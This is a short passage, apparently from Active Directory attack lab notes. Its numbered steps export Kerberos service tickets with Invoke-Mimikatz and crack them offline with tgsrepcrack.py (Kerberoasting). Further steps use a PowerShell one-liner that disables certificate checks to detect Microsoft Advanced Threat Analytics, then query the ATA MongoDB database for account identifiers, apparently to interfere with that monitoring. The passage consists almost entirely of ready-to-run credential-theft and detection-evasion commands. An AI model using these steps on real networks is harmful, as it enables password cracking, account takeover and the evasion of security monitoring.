  3. Export the ticket Invoke-Mimikatz -Command '"kerberos::list /export"' Attack Offline python.exe .\tgsrepcrack.py .\passwords.txt '.\2-40a10000-labuser@MSSQLSvc~ops-file.offensiveps.com~SQLEXPRESS-OFFENSIVEPS.COM.kirbi'
  4. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};(New-Object Net.Webclient).DownloadString('https://IPAddr').Contains('Microsoft Advanced Threat Analytics')
  5. SourceAccountId can be retrieved from the UniqueEntity collection: db.getCollection('UniqueEntity').find({"Name" : "term admin"})